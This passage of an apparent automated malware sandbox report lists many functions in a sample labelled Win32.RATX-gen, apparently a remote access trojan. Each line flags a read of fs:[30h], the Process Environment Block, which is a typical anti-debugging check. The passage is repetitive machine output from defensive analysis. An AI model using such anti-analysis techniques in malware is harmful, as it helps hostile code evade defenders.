                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC9C5 mov eax, dword ptr fs:[00000030h]0_2_022AC9C5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC9C5 mov eax, dword ptr fs:[00000030h]0_2_022AC9C5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC9C5 mov eax, dword ptr fs:[00000030h]0_2_022AC9C5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEE2E mov eax, dword ptr fs:[00000030h]0_2_022BEE2E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEE2E mov eax, dword ptr fs:[00000030h]0_2_022BEE2E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov ecx, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFE8E mov eax, dword ptr fs:[00000030h]0_2_022BFE8E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227CE95 mov eax, dword ptr fs:[00000030h]0_2_0227CE95
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227CE95 mov ecx, dword ptr fs:[00000030h]0_2_0227CE95
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFEEE mov eax, dword ptr fs:[00000030h]0_2_022BFEEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFEEE mov eax, dword ptr fs:[00000030h]0_2_022BFEEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCF20 mov eax, dword ptr fs:[00000030h]0_2_022DCF20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCF20 mov eax, dword ptr fs:[00000030h]0_2_022DCF20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AAF31 mov ecx, dword ptr fs:[00000030h]0_2_022AAF31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AAF31 mov eax, dword ptr fs:[00000030h]0_2_022AAF31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C4F0E mov eax, dword ptr fs:[00000030h]0_2_022C4F0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C4F0E mov eax, dword ptr fs:[00000030h]0_2_022C4F0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEF1C mov eax, dword ptr fs:[00000030h]0_2_022BEF1C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEF1C mov eax, dword ptr fs:[00000030h]0_2_022BEF1C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CAF4E mov eax, dword ptr fs:[00000030h]0_2_022CAF4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CAF4E mov ecx, dword ptr fs:[00000030h]0_2_022CAF4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DEF5D mov eax, dword ptr fs:[00000030h]0_2_022DEF5D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DEF5D mov ecx, dword ptr fs:[00000030h]0_2_022DEF5D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3FAA mov eax, dword ptr fs:[00000030h]0_2_022C3FAA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3FAA mov eax, dword ptr fs:[00000030h]0_2_022C3FAA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6FBE mov eax, dword ptr fs:[00000030h]0_2_022D6FBE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFFEE mov eax, dword ptr fs:[00000030h]0_2_022BFFEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0C32 mov eax, dword ptr fs:[00000030h]0_2_022E0C32
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C2C6A mov ecx, dword ptr fs:[00000030h]0_2_022C2C6A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7C54 mov eax, dword ptr fs:[00000030h]0_2_022D7C54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7C54 mov eax, dword ptr fs:[00000030h]0_2_022D7C54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7C54 mov eax, dword ptr fs:[00000030h]0_2_022D7C54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02281C8D mov eax, dword ptr fs:[00000030h]0_2_02281C8D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C4C82 mov eax, dword ptr fs:[00000030h]0_2_022C4C82
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov ecx, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov ecx, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6C90 mov eax, dword ptr fs:[00000030h]0_2_022D6C90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6C90 mov eax, dword ptr fs:[00000030h]0_2_022D6C90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AECEE mov eax, dword ptr fs:[00000030h]0_2_022AECEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AECEE mov ecx, dword ptr fs:[00000030h]0_2_022AECEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0CFF mov eax, dword ptr fs:[00000030h]0_2_022E0CFF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8CFE mov eax, dword ptr fs:[00000030h]0_2_022C8CFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8CFE mov ecx, dword ptr fs:[00000030h]0_2_022C8CFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFCCF mov eax, dword ptr fs:[00000030h]0_2_022DFCCF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFCCF mov eax, dword ptr fs:[00000030h]0_2_022DFCCF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCCC8 mov eax, dword ptr fs:[00000030h]0_2_022DCCC8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCCC8 mov eax, dword ptr fs:[00000030h]0_2_022DCCC8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABD5C mov eax, dword ptr fs:[00000030h]0_2_022ABD5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABD5C mov eax, dword ptr fs:[00000030h]0_2_022ABD5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CDCA mov eax, dword ptr fs:[00000030h]0_2_0228CDCA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CDCA mov eax, dword ptr fs:[00000030h]0_2_0228CDCA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0DCC mov eax, dword ptr fs:[00000030h]0_2_022E0DCC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0DCC mov eax, dword ptr fs:[00000030h]0_2_022E0DCC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0DCC mov eax, dword ptr fs:[00000030h]0_2_022E0DCC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEDCE mov eax, dword ptr fs:[00000030h]0_2_022BEDCE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
